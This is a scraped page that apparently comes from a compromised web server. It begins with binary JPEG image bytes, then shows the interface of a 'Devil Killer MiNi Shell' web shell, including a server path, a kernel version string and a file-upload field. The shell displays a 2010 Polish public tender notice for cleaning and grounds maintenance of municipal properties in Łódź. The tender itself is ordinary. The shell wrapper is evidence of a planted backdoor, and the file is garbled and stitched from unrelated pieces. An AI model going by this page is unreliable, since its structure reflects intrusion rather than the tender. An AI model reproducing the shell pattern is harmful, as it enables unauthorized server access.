JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100430/105179-N-2010.html

<p class="kh_header"><b>Łódź: Usługi związane z kompeksowym sprzątaniem - utrzymaniem w należytym stanie sanitarno-porządkowym nieruchomości oraz terenów przynażnych do nieruchomości</b><br>
<b>Numer ogłoszenia: 105179 - 2010; data zamieszczenia: 30.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Górna "Wschód" , ul. Lubelska 9/11/8, 93-129 Łódź, woj. łódzkie, tel. 042 6847601, faks 042 6847576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> anwschod.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi związane z kompeksowym sprzątaniem - utrzymaniem w należytym stanie sanitarno-porządkowym nieruchomości oraz terenów przynażnych do nieruchomości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi związane z kompleksowym sprzątaniem  
    - utrzymaniem w należytym stanie sanitarno-porządkowym powierzchni     
    wewnętrznych nieruchomości oraz terenów niezabudowanych i zielonych 
    przynależnych do nieruchomości administrowanych przez Zamawiającego, ujęte 
    w trzech częściach (zadaniach):

część I - zadanie nr 1 (zał. do SIWZ nr 1a)    
                   pow. wew. nieruchomości              -      6.580,00 m2
                   tereny zew. niezabudowane            -    40.238,70 m2  
	         tereny zielone                                  -    17.491,92 m2    
                                                ogółem:              -    63.940,62 m2
część II - zadanie nr 2  (zał. do SIWZ  nr 1b)  
                   pow. wew. nieruchomości               -    5.867,60 m2
                   tereny zew. niezabudowane             -  25.788,00 m2  
	         tereny zielone                                   -    7.977,00 m2  
                                                 ogółem:              -  39.632,60 m2

część III - zadanie nr 3 (zał. do SIWZ nr 1c)  
                   pow. wew. nieruchomości                -   33.692,00 m2
                   tereny zew. niezabudowane              -   72.196,40 m2  
	         tereny zielone                                    -   16.900,00 m2   
                                                 ogółem:               - 122.788,40 m2

    stanowiących zał. nr.1a, 1b, 1c,  do niniejszej Specyfikacji Istotnych Warunków     
    Zamówienia w zakresie:
a) utrzymania w należytym stanie sanitarno-porządkowym powierzchni wewnętrznych 
    nieruchomości w tym: 
  - biegi i podesty klatek schodowych, korytarze, wc-ogólne - codzienne sprzątanie 
    wraz z usuwaniem kurzu i pajęczyn -  mycie jeden raz w tygodniu,
  - drzwi wejściowe do budynków - mycie jeden raz w miesiącu,
  - okna na klatkach schodowych, w pralniach i w suszarniach - mycie co sześć 
    miesięcy (dwa razy w trakcie realizacji zamówienia - jeden raz przed świętami 
    Bożego Narodzenia, jeden raz przed świetami Wielkanocnymi);
  - pralnie i suszarnie - sprzątanie jeden raz w m-cu, 
  - korytarze, strychy i piwnice - usuwanie odpadów wielkogabarytowych w miejsce    
    składowania pojemników na odpady komunalne na nieruchomości - według potrzeb
    (częstotliwość i ilość gabarytów  trudna do określenia  uzależniona od prac 
    remontowych wykonywanych przez najemców lokali). Zamawiający nie posiada 
    żadnej wiedzy o usuniętych odpadach  wielkogabarytowych w latach ubiegłych,
b) utrzymania w należytym stanie sanitarno-porządkowym terenów niezabudowanych  
    przynależnych do nieruchomości oraz tarasów i schodów pawilonów w tym:
  - obszar chodników, studzienek ściekowych, dojść do budynków mieszkalnych i 
    gospodarczych zbiorowego użytku (komórek lokatorskich, pralni), garaży, miejsc 
    ustawienia pojemników na odpady komunalne,  tarasów i schodów pawilonów - 
   codzienne  sprzątanie, a - w okresie  zimowym -  codzienne, sukcesywne  i 
   niezwłoczne  usuwanie skutków zimy w systemie całodobowym: opadów śniegu, 
    gołoledzi - częstotliwość i wielkość niemożliwa do określenia - uzależniona od 
     warunków atmosferycznych niezależnych od Zamawiającego (użyty piasek 
     należy niezwłocznie usunąć po ustaniu gołoledzi - koszt dostawy piasku do 
     posypywania, obciąża Wykonawcę),
  - gromadzenie zgarnianego śniegu w miejscach nie utrudniających prawidłową 
    komunikację pieszych wraz z wywozem  nagromadzonego (spryzmowanego) śniegu z 
    wąskich chodników w miejsca wyznzczone przez Zamawiającego. Zamawiający 
    zakazuje zgarniania śniegu, lodu, błota pośniegowego z chodnika lub z innych miejsc 
    na jezdnię;  
  - tarasy i schody pawilonów w okresie od m-ca IV do m-ca X (dot: zadania 2 poz. 19 
    tj Dąbrowskiego 91 -192,11 m2, Dąbrowskiego 91a  - 194,85 m2, Dąbrowskiego 91b 
    - 194,74 m2 - wymienione powierzchnie zostały uwzględnione w powierzchni 
    zewnętrznej) - mycie jeden raz na tydzień,
 - w przypadku ustawienia na powierzonym terenie pojemników na psie odchody 
    umieszczania w nich toreb foliowych oraz opróżniania tych pojemników  - wg 
    potrzeb (częstotliwość opróżniania  i  ilość pojemników  nie jest możliwa do 
    określenia - koszt zakupu toreb foliowych obciąża Wykonawcę)), 
c) utrzymania w należytym stanie sanitarno-porządkowym terenów zielonych  
    przynależnych do nieruchomości - w okresie wegetacji od m-ca IV do m-ca X:
  - sprzątanie śmieci - codziennie,
 -  przycinanie krzewów i żywopłotów- wg potrzeb, 
  - pokos traw (koszenie) - jeden raz w miesiącu,
  - grabienie skoszonej trawy, opadłych liści, usuwanie leżących gałezi wraz z ich 
    wywozem i utylizacją  przy użyciu własnego transportu i na koszt własny - 
    sukcesywnie i niezwłocznie do uzyskania czystości na terenach zielonych 
    (częstotliwość i wielkość niemożliwa do określenia uzależniona od warunków 
    atmosferycznych niezależnych od Zamawiającego, Zamawiający zastrzega, że wyżej 
    wymienione odpady nie mogą być umieszczane w pojemnikach na odpady komunalne 
    ustawione w nieruchomościach, a także pozostawiane na terenie administrowanym 
    przez Zamawiającego.
  - miejscowe usuwanie powstałych przedeptów poprzez dosianie traw 
    (wielkość trudna do określenia przez Zamawiającego, uzależniona od dokonanych 
     zniszczeń przez przechodniów)- koszt nasiona trawy obciąza Wykonawcę, 
d) utrzymania w należytym stanie sanitarno-porządkowym terenów zielonych  
    przynależnych do nieruchomości - po okresie wegetacji od m-ca XI do m-ca III:
  - sprzątanie śmieci - codziennie,
  - grabienie opadłych liści, usuwanie leżących gałezi wraz z ich wywozem i utylizacją 
    przy użyciu własnego transportu i na koszt własny - sukcesywnie i niezwłocznie do 
    uzyskania czystości na terenach zielonych (częstotliwość i wielkość niemożliwa do 
    określenia uzależniona od warunków atmosferycznych niezależnych od 
    Zamawiającego), Zamawiający zastrzega, że wyżej wymienione odpady nie mogą być 
    umieszczane w pojemnikach na odpady komunalne ustawione w nieruchomościach, a 
    także pozostawiane na terenie administrowanym przez Zamawiającego.
e) nadzorowania właściwego opróżniania pojemników na odpady komunalne, 
    utrzymywania porządku w obrębie ustawienia pojemników, usuwania resztek 
    śmieci powstałych podczas opróżniania tych pojemników oraz ich ustawiania w 
    miejsca  wyznaczone, w tym także bieżące informowanie Zamawiającego  o 
    uszkodzonych pojemnikach na odpady komunalne i ich przepełnieniu, a także 
    nadzoru nad terminowym wywozem odpadów wielkogabarytowych złożonych w 
    tych miejscach;
f) zamieszczania ogłoszeń i informacji dla lokatorów w miejscach do tego 
    wyznaczonych wraz z porządkowaniem tych miejsc - wg potrzeb; 
g) bieżącej wymiany przepalonych żarówek wraz z uzupełnieniem brakujących 
    żarówek w nieruchomościach - dotyczy pomieszczeń wspolnych nieruchomości - 
    koszt żarówek obciąża Wykonawcę, (Zamawiający nie posiada żadnej wiedzy o 
    ilości wymienionych żarówek w latach ubiegłych);
h) okolicznościowego wywieszania flag we wszystkich  nieruchomościach 
    zabudowanych  z bieżącym nadzorem - monitoringiem Wykonawcy  oraz 
    natychmiastowe uzupełnienia brakujących lub niewłaściwych flag  np. z tytułu 
    kradzieży lub uszkodzenia przez osoby trzecie, zabrudzenia  itp.- zgodnie z 
    określonym poniżej harmonogramem tj.
    flaga państwowa
    1 maja -  Święto Pracy, 
    2 maja -  Dzień Flagi Rzeczypospolitej Polskiej,
    3 maja -  Święto Narodowe Trzeciego Maja,
    9 maja  - Święto Narodowe Zwycięstwa i Wolności,
  15 sierpnia - Dzień Wojska Polskiego, 
  31 sierpnia - Dzień Solidarności i Wolności,
    1 września  -  rocznica wybuchu II wojny światowej oraz Dzień Weterana,
  11 listopada - Narodowe Świeto Niepodległości,
    flaga miasta
   19 stycznia - rocznica wyzwolenia więzienia na Radogoszczu,
   15 maja - Święto Miasta,
   13 czerwca - rocznica wizyty Ojca Świetego Jana Pawła II,
    5 października - rocznica ustanowienia Świętej Faustyny Kowalskiej patronką Łodzi,
   flaga papieska   
    13 czerwca - rocznica wizyty Ojca Świetego Jana Pawła II,
    16 października  - Dzień Konklawe wyboru Papieża Jana Pawła II,
    Flagę państwową, miejską i papieską podnosi się nie wcześniej niż w dniu 
    poprzedzającym święta i rocznice, a opuszcza się nie później niż w dniu bezpośrednio 
    następującym po dniu, w którym przypada święto lub rocznica jak również  na każde 
    dodatkowe żądanie Zamawiającego - koszt flag obciąża Wykonawcę.
i)  usuwania na bieżąco plakatów i ogłoszeń z elewacji, drzwi wejściowych, prześwitów 
    bramowych, słupów i innych miejsc do tego nieprzeznaczonych,
j)  zgłaszania Zamawiającemu zaistniałych zagrożeń (np.nawisy śniegowe, sople 
    lodowe, uszkodzenia instalacji elektrycznej, uszkodzenia elewacji zagrażające 
    bezpieczeństwu ludzi);
k) opróżniania i sprzątania lokali mieszkalnych wraz z przynależnymi komórkami i 
    użytkowych na skutek zgonów najemców lub eksmisji w budynkach będących w 
    zarządzie Zamawiającego oraz lokali gminnych wraz z przynależnymi komórkami, 
    administrowanych przez Zamawiajacego w  budynkach Wspólnot Mieszkaniowych 
    znajdujących się w obrębie ulic poszczególnego zadania - za odrębnym zleceniem w 
    terminie do 14 dni od dnia otrzymania zlecenia od Zamawiającego. Wykonawca ma 
    obowiązek udokumentować Zamawiającemu  odbiór przyjęcia usuniętych odpadów - 
    ruchomości do ich utylizacji ze składowiska odpadów. Powyższy dokument 
    powinien zawierać m.in. adres nieruchomości i ilość przekazanych odpadów. 
    Zamawiający zastrzega, że wyżej wymienione odpady nie mogą być umieszczane w 
    pojemnikach na odpady komunalne ustawione w nieruchomościach, a także    
    pozostawiane na terenie administrowanym przez Zamawiającego; 
l)  wykonywania eksmisji z lokali budynków będących w zarządzie Zamawiającego 
    oraz z lokali gminnych administrowanych przez Zamawiajacego w  budynkach 
    Wspólnot Mieszkaniowych znajdujących się w obrębie ulic poszczególnego zadania 
    do lokalu wskazanego przez Zamawiającego z wyniesieniem ruchomości, z 
    transportem i wniesieniem ruchomości - za odrębnym zleceniem w terminie 
    uzgodnionym przez Zamawiającego;
ł)  wykonywania na żądanie Zamawiającego prac pomocniczych realizowanych 
    przez pracownika Wykonawcy np. przenoszenie mebli na rzecz Zamawiającego - za 
    odrębnym zleceniem w terminie uzgodnionym przez Zamawiającego;
    Czynności wymienione w ust. 2 Wykonawca będzie wykonywał przy pomocy 
    własnych pracowników i materiałów (piasek do posypywania chodników w 
    okresie zimy, żarówki, torby foliowe, flagi, środki czystościowe do mycia, 
    nasiona traw), a także przy użyciu własnych narzędzi i sprzętu (łopaty do 
    śniegu, odkuwacze do lodu, kosiarki, podkaszarki, grabie, sekatory, piły, miotły, 
    szczotki, ścierki i tym podobne) oraz własnego transportu (samochód ciężarowy, 
    ciągnik).
2. W ramach zamówienia Wykonawca zobowiązany będzie do wykonywania   
    czynności objętych zamówieniem z opisaną powyżej częstotliwością, która winna 
    gwarantować: 
a) odpowiedni stan sanitarno-porządkowy nieruchomości; 
b) odpowiedni stan bezpieczeństwa pożarowego nieruchomości (opróźnianie strychów, 
    korytarzy i piwnic z przedmiotów stwarzających zagrożenie);
c) odpowiedni stan porządkowy terenów przynależnych do nieruchomości, 
    niezabudowanych, tarasów i schodów pawilonów - także w zakresie zabezpieczenia 
    od skutków oblodzeń i opadów śniegu (w okresie zimowym Zamawiający będzie 
    wymagał natychmiastowego przystąpienia do usuwania skutków zimy w przypadku 
    zaistnienia intensywnych opadów śniegu lub wystąpienia gołoledzi);
d) odpowiedni stan estetyczny terenów zielonych przynależnych do nieruchomości; 
3. Wykonawca przejmuje na siebie obowiązki i odpowiedzialność za  utrzymanie w 
    należytym stanie sanitarno - porządkowym powierzonego terenu nieruchomości 
    i terenów przynależnych do nieruchomości niezabudowanych i zielonych w 
    rozumieniu ustawy z dnia 13.09.1996 r. (Dz.U. z 1996 r. Nr 132 poz. 622 
    z późniejszymi zmianami) oraz uchwały Rady Miejskiej w Łodzi 
    Nr LXII/1159/06  z dnia 01.02.2006 r. z późniejszymi zmianami O utrzymaniu 
    czysytości i porządku w gminach, w tym także odpowiedzialność za wykroczenia 
    uregulowaną w przepisach karnych.                                                                                
4. Wykonawca zobowiązany jest do posiadania aktualnej umowy ze składowiskiem 
     odpadów zielonych - kompostownią..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 77.31.00.00-6, 90.60.00.00-3, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonego 
    w art. 22 ust. 1 Ustawy, który dotyczy: 
a) posiadania wiedzy i doświadczenia
    Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez 
    wykazanie w zał. Nr 4 do niniejszej SIWZ, wykonanych usług lub usług w 
    trakcie realizacji w okresie ostatnich trzech lat przed upływem terminu składania 
    ofert, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających 
    swoim rodzajem usługom stanowiącym przedmiot zamówienia z podaniem ich 
    wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu 
    potwierdzajacego, że usługi  te zostały wykonane lub są wykonywane należycie w 
    ilości: w przypadku składania oferty na trzy części (zadania) co najmniej: trzech 
    usług w okresie 12 m-cy  na kwotę  min. 600.000,00 zł  brutto - w tym: 

 - dla części I (zadania nr 1) - min. jednej na kwotę 150.000,00 zł brutto,
 - dla części II (zadania nr 2) - min. jednej na kwotę 100,000,00 zł brutto,
 - dla części III (zadania nr 3) - min. jednej na kwotę 350,000,00 zł brutto,
Dla usług będących w trakcie realizacji należy załączyć oświadczenie o podpisanej umowie z informacją potwierdzającą, że usługi są wykonywane należycie. Kwota podpisanej umowy nie może być niższa niż kwoty określone powyżej.   
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
    Wykonawców dokumentów i oświadczeń  na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonego 
    w art. 22 ust. 1 Ustawy, który dotyczy:
a) dysponowania potencjałem technicznym 
    Wykonawcy winni wykazać zał. nr 5 do SIWZ, że dla zapewnienia utrzymania 
    należytego stanu sanitarno - porządkowego nieruchomości i terenów przynależnych 
    do nieruchomości  niezabudowanych i zielonych będą dysponować następującym  
    sprzętem: (co najmniej: jeden samochód ciężarowy o ładowności powyżej 0,9 t lub 
    jeden ciągnik rolniczy z przyczepą, oraz dla każdej części zamówienia (zadania):
       - minimum pięć kosiarek spalinowych,
       - minimum trzy podkaszarki,
Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
    Wykonawców dokumentów i oświadczeń  na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia spełnienia warunku udziału w postępowaniu, określonego 
    w art. 22 ust. 1 Ustawy, który dotyczy:

a) dysponowania osobami zdolnymi do wykonania zamówienia
    Wykonacy winni oświadczyć zał. nr 6 do SIWZ, że dla zapewnienia utrzymania 
    należytego stanu sanitarno - porządkowego nieruchomości i terenów przynależnych 
do nieruchomości niezabudowanych i zielonych będą dysponować:  
  - dla części I (zadania nr 1) - minimum 10 osobami,
  - dla części II (zadania nr 2) - minimum 8 osobami,
  - dla części III (zadania nr 3) - minimum 20 osobami,
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
    Wykonawców dokumentów i oświadczeń na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W zakresie potwierdzenia spełnienia warunku udziału w postępowaniu, określonego 
    w art. 22 ust. 1 Ustawy, który dotyczy:
a) sytuacji ekonomicznej i finansowej
    Wykonawcy winni udokumentować, że posiadają polisę ubezpieczeniową lub inny 
    dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności 
    cywilnej w zakresie prowadzonej działalności  na sumę ubezpieczenia nie mniej niż 
    400.000,00 zł. niezależnie od ilości części (zadań) do których przystępuje 
    Wykonawca. W przypadku załączenia dokumentu na okres krótszy od terminu 
    zamówienia, do oferty należy dołączyć pisemne zobowiązanie o przedłużeniu 
    ważności ubezpieczenia.      
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
    Wykonawcę dokumentów i oświadczeń na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
